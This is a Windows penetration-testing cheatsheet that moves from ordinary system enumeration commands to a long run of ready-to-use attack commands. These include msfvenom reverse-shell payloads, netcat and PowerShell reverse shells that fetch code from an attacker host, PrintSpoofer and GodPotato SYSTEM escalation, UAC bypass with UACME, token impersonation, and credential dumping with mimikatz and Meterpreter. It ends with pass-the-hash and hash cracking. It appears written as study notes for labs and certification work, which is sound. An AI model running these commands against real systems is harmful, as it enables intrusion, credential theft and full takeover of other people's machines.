Cheatsheet
Topics
Introduction to the Windows Shells
Windows Permissions
Reverse Shells in Windows
SeImpersonatePrivilege Exploitation
On Cross Compilation
Windows Services
Weak Service Permissions
Unquoted Service Path
DLL Hijacking
Always Install Elevated
Files with Sensitive Data
Windows Hashes
Stored Credentials and the Windows Vault
Scheduled Task
Critical Registry Paths
Useful Tools
AMSI Bypass
Win Enumeration
System Information Commands
Operating System and Version:
systeminfo # Displays detailed system information ver # Displays Windows version winver # Displays Windows version and build number msinfo32 # Opens System Information tool. wmic os get name,version,buildnumber # Retrieves OS version/build info
Hardware Information:
getmac /v # Displays MAC address hostname # Displays computer name
Environment Variables:
set # Lists all environment variables echo %PATH% # Prints a specific environment variable path # Displays or modifies the PATH environment variable
File System and Directory Management
Navigation and Directory Structure:
cd # Change current directory dir # List files and directories tree # Graphical view of directory structure
File Operations:
type NUL > file.txt # Create a new file echo "text" > file.txt # Write text into a file type file.txt # Display file contents del file.txt # Delete a file copy file1 file2 # Copy files move file1 folder/ # Move files ren oldname new_name # Rename files
Directory Operations:
mkdir new_folder # Create a directory rd folder_name # Remove a directory
3. Networking Commands
Network Information:
ipconfig /all # Displays all network interfaces netstat -ano # Shows network connections and listening ports route print # Displays the routing table netsh wlan show profiles # Shows Wi-Fi profiles
Testing and Troubleshooting:
ping google.com # Test connectivity tracert microsoft.com # Trace route to a destination nslookup google.com # DNS queries
Permissions and User Management
User Information:
whoami # Displays current user whoami /groups # Lists user groups whoami /priv # Shows user privileges net user # Lists all users net user <USERNAME> # Displays user details net localgroup Administrators #Manages local groups
Permissions and Policies:
icacls file.txt # Displays file permissions net accounts # Displays account policies gpupdate /force # Updates Group Policy settings gpresult /r # Displays Group Policy results
Process and Service Management
Process Management:
tasklist # Lists running processes taskkill /IM process.exe /F # Terminates processes
Service Management:
net start "ServiceName" # Starts a service sc.exe start <SERVICE> # Starts a service net stop "ServiceName" # Stops a service sc.exe stop <SERVICE> # Stops a service sc query # Queries Windows services sc.exe qc <SERVICE> # Checks Service Configuration Get-Service # PowerShell alternative for service details sc.exe config <SERVICE> binPath="C:\Path\to\malicious.exe" #Changes the Binary Path of a Service sc.exe sdshow <SERVICE> # Checks Service Permissions sc.exe sdset <SERVICE> <SDDL> # Updates Service Permissions .\accesschk64.exe /accepteula -uwcqv SimpleService # Verify Service Permissions ConvertFrom-SddlString -Sddl <SDDL> #Convert SDDL to Readable Format wmic process list full | Select-String 'executablepath=C:' | Select-String -NotMatch 'system32|syswow' #Get Executable Path for All Processes x86_64-w64-mingw32-gcc -mwindows -municode -O2 -s -o simpleService.exe simpleService.c #Compiling a Custom Service
Windows System Utilities
Administrative Tools:
mmc # Opens Microsoft Management Console eventvwr # Opens Event Viewer services.msc # Opens Services Management Console
Performance and Disk Management:
perfmon # Opens Performance Monitor resmon # Opens Resource Monitor diskmgmt.msc # Opens Disk Management cleanmgr # Opens Disk Cleanup defrag C: # Defragments the drive
PowerShell - System, User, Process and Service
PowerShell Commands for Local Accounts:
Get-LocalUser # Lists local users Get-LocalGroup # Lists local groups Get-LocalGroupMember <GROUP_NAME> # Lists members of a group
System File Management:
sfc /scannow # Scans and repairs system files chkdsk C: /f # Checks and fixes disk errors
Registry and Configuration Management:
reg query HKLM\Software # Queries the registry msconfig # Opens System Configuration
List Environment Variables
dir env:
Search Files Recursively
Get-ChildItem -Path C:\Users\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue Get-ChildItem -Path C:\Users\ -Include *.txt -File -Recurse -ErrorAction SilentlyContinue
List Running Processes
Get-Process
List Installed Applications (32-bit)
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName
List Installed Applications (64-bit)
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName
Retrieve Service Information
Get-Service * | Select-Object DisplayName,Status,ServiceName,Can* Get-CimInstance -ClassName Win32_Service | Select-Object Name,State,PathName | Where-Object {$_.State -like 'Running'}
File Transfer and Reverse Shell
Generate a reverse shell payload
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe
Using certutil
Certutil is a Windows tool that can download files:
certutil -urlcache -split -f http://attacker_ip/file.exe file.exe
Using PowerShell PowerShell (iwr) can download files via HTTP:
Invoke-WebRequest -Uri http://attacker_ip/file.exe -OutFile file.exe
Using FTP Windows supports FTP commands:
ftp
open <attacker_ip>
put file.txt
get file.txt
Using SMB Shares Files can be transferred using network shares:
net use \\<attacker_ip>\share /user:username password
copy file.exe \\<attacker_ip>\share
Netcat Set up a listener on the attacker machine:
nc -lvp 4444 > file.exe
Send the file from the target:
nc attacker_ip 4444 < file.exe
Python Simple HTTP Server On the attacker machine:
python3 -m http.server 80
On the target machine:
certutil -urlcache -split -f http://attacker_ip/file.exe file.exe
Spawning a Reverse Shell
cmd.exe
The cmd.exe
reverse shell relies on utilities like ncat.exe
to establish a connection. The process involves downloading the necessary binary, setting up a listener on the attacker machine, and initiating the reverse connection from the victim machine.
Steps
Download
ncat.exe
on the Target Machinencat.exe
(a lightweight implementation of Netcat) is required for creating the reverse shell.iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -OutFile nc64.exe
Set Up a Listener on the Attacker Machine The attacker machine must have a listener ready to receive the reverse connection.
nc -lvnp 7777
Initiate the Reverse Shell from the Target Machine On the victim machine, execute the following command to connect back to the attacker and spawn a shell:
C:\Users\Quickemu\Desktop\nc64.exe 192.168.122.1 7777 -e cmd
Powershell
Using Invoke-PowerShellTcp.ps1
Script
Invoke-PowerShellTcp.ps1
is a PowerShell script designed for reverse shells.
Download the Script on the Attacker Machine
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Configure the Script Add the line to specify the attacker's IP and port:
echo "Invoke-PowerShellTcp -Reverse -IPAddress <Attacker_Machine> -Port 7777" >> Invoke-PowerShellTcp.ps1
Host the Script on an HTTP Server Use Python to serve the script for download:
python3 -m http.server 1337
Start listening mode with Netcat on attacker machine
netcat -nvlp 7777
Execute the Script from the Target Machine
From CMD:
powershell -c "iex(new-object net.webclient).downloadstring(\"http://192.168.122.1:1337/Invoke-PowerShellTcp.ps1\")"
From PowerShell:
iex(new-object net.webclient).downloadstring("http://<Attacker_Machine>:1337/Invoke-PowerShellTcp.ps1")
Win Priv Esc
SeImpersonatePrivilege
Checking for SeImpersonatePrivilege
To verify whether the current user has this privilege, run the following:
whoami /priv
Sample Output
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeImpersonatePrivilege Impersonate a client after authentication Enabled
If the SeImpersonatePrivilege
is enabled, the user can exploit it for privilege escalation using tools like PrintSpoofer or GodPotato.
SeImpersonatePrivilege Privilege Escalation
Initial Setup
Start a Listener on the Attacker Machine
nc -lvnp 5555
Download Netcat on the Victim Machine
iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe
PrintSpoofer
PrintSpoofer leverages misconfigured print spooler services to escalate privileges to SYSTEM.
Download the Exploit
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe
Execute the Exploit Run the following command to establish a SYSTEM shell:
PrintSpoofer64.exe -c "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
GodPotato
Identify .NET Framework Version Use the following command to determine the .NET version installed:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
Download the Appropriate GodPotato Version Depending on the .NET version:
.NET 2.0:
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe
.NET 3.5:
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -Outfile GodPotato-NET35.exe
.NET 4.0:
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -Outfile GodPotato-NET4.exe
Execute the Exploit Use the appropriate executable to escalate privileges and spawn a reverse shell:
.\GodPotato-NET2.exe -cmd "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
winPEAS
Download the binary:
wget https://github.com/peass-ng/PEASS-ng/releases/download/20241011-2e37ba11/winPEASx64.exe
Running winPEAS to Enumerate Services
Use the
servicesinfo
option to gather information about services:
.\winPEASx64.exe quiet servicesinfo
Kernel
# WIN KERNEL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f exe -o payload.exe
python3 -m http.server
# Download payload.exe on target
## Windows-Exploit-Suggester Install
mkdir Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
# ^^ This is a python3 version of the script
cd Windows-Exploit-Suggester
python ./windows-exploit-suggester.py --update
pip install xlrd --upgrade
./windows-exploit-suggester.py --database YYYY-MM-DD-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
./windows-exploit-suggester.py --database YYYY-MM-DD-mssb.xlsx --systeminfo win2008r2-systeminfo.txt
## METASPLOIT
## Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/handler
options
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>
use post/multi/recon/local_exploit_suggester
set SESSION <HANDLER_SESSION_NUMBER>
## MsfConsole Meterpreter Privesc
getprivs
getsystem
# Exploitable vulnerabilities modules
exploit/windows/local/bypassuac_dotnet_profiler
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_sdclt
exploit/windows/local/cve_2019_1458_wizardopium
exploit/windows/local/cve_2020_1054_drawiconex_lpe
exploit/windows/local/ms10_092_schelevator
exploit/windows/local/ms14_058_track_popup_menu
exploit/windows/local/ms15_051_client_copy_image
exploit/windows/local/ms16_014_wmi_recv_notif
UAC
# UAC - UACME
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f exe > backdoor.exe
## METASPLOIT - Listening
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>
## Meterpreter (Unprivileged session)
cd C:\\
mkdir Temp
cd Temp
upload /root/backdoor.exe
upload /root/Desktop/tools/UACME/Akagi64.exe
shell
Akagi64.exe 23 C:\Temp\backdoor.exe
akagi32.exe [Key] [Param]
akagi64.exe [Key] [Param]
## Elevated Meterpreter Received on the listening session
ps -S lsass.exe
migrate <lsass_PID>
hashdump
Access Token
# ACCESS TOKEN IMPERSONATION
## METASPLOIT - Meterpreter (Unprivileged session)
pgrep explorer
migrate <explorer_PID>
getuid
getprivs
load incognito
list_tokens -u
impersonate_token "ATTACKDEFENSE\Administrator"
getuid
getprivs # Access Denied
pgrep explorer
migrate <explorer_PID>
getprivs
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
Windows Credential Dumping
# Exploitation
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TARGET_IP> LPORT=1234 -f exe > payload.exe
python -m SimpleHTTPServer 80
#Grant Privilege to a User:
Add-LocalGroupMember -Group "Backup Operators" -Member "Leonardo"
#Save SAM and SYSTEM Files:
reg save hklm\sam C:\Users\Leonardo\Desktop\SAM.hive
reg save hklm\system C:\Users\Leonardo\Desktop\SYSTEM.hive
## METASPLOIT
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>
run
## On target system
certutil -urlcache -f http://<TARGET_IP>/payload.exe payload.exe
# Run payload.exe
# METASPLOIT - Meterpreter
sysinfo
getuid
pgrep lsass
migrate <explorer_PID>
getprivs
# Creds dumping - Meterpreter
load kiwi
creds_all
lsa_dump_sam
lsa_dump_secrets
# MIMIKATZ
cd C:\\
mkdir Temp
cd Temp
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shell
mimikatz.exe
privilege::debug
lsadump::sam
lsadump::secrets
sekurlsa::logonPasswords
mimikatz64.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
# PASS THE HASH
## sekurlsa::logonPasswords
background
search psexec
use exploit/windows/smb/psexec
set LPORT <LOCAL_PORT2>
set SMBUser Administrator
set SMBPass <ADMINISTRATOR_LM:NTLM_HASH>
exploit
System Logs
Get-History # Retrieve Commands from Memory
(Get-PSReadlineOption).HistorySavePath # Retrieve History File Location
Cracking Windows Hashes
#Download rockyou.txt:
curl -L https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz | tar -xz
#LM Hash:
john --format=lm --wordlist=rockyou.txt hash.txt
hashcat -m 3000 -a 3 hash.txt
#NTLM Hash:
john --format=nt --wordlist=rockyou.txt hash.txt
hashcat -m 1000 -a 3 hash.txt
#Net-NTLMv1:
john --format=netntlm --wordlist=rockyou.txt hash.txt
hashcat -m 5500 -a 3 hash.txt
#Net-NTLMv2:
john --format=netntlmv2 --wordlist=rockyou.txt hash.txt
hashcat -m 5600 -a 3 hash.txt
Crackmapexec
crackmapexec smb <TARGET_IP> -u Administrator -H "<NTLM_HASH>" -x "whoami"
Cmd.exe official documentation
PowerShell official documentation
Last updated